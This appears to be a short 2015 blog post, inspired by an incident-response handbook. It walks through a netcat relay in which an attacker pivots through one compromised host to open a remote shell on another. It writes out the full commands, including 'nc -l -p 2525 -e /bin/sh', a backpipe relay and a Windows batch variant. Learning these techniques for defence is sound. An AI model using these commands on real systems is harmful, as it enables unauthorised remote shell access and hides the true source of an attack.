Wednesday, May 20, 2015

Netcat Relay on Linux

I purchased the book "Blue Team Handbook: Incident Response Edition" and it arrived today.  I skimmed the whole book and now I am going back through to look closer at a few items that caught my eye. One of them was the setting up of a netcat relay on linux.

The netcat relay works if you have 3 hosts:
Host 1 - 10.9.9.5 - Attacker
Host 2 - 10.9.9.10 - Compromised Victim (Pivot point or relay point)
Host 3 - 10.9.9.15 - Compromised Victim

On Host 1 you execute: "nc -l -p 4545".  This opens a listening port on your attacking computer.

On Host 3 you execute: "nc -l -p 2525 -e /bin/sh".  This opens a listening port and upon connect executes an interactive shell.

Then on Host 2 you execute the following commands:
"mknod backpipe p"
"nc 10.9.9.5 4545 0<backpipe | nc 10.9.9.15 2525 1>backpipe"

If a windows host was in the middle you would execute the following:
"echo nc 10.9.9.15 2525 > relay.bat"  # You need permission to write a file called relay.bat
"nc 10.9.9.5 4545 -e relay.bat"

The commands that are executed on Host 1 are then relayed through Host 2 to Host 3 giving the appearance that Host 2 is the one attacking Host 3.

Here is a link to SANS netcat cheat sheet demonstrating how it can be done on Windows also.

Here is a link to a video that goes through the above scenario using 3 linux hosts.  In the book it is a little different due to only using an Attacker and a Victim for their example, which works also!

Below if you click on the picture of the book it will take you to how you can order it on Amazon:


No comments:

Post a Comment

Powershell - Gather Mapped Drives from a List of Computer Names

I created the following Powershell script to gather remotely the mapped drives that users had in their profiles.  I had to create the script...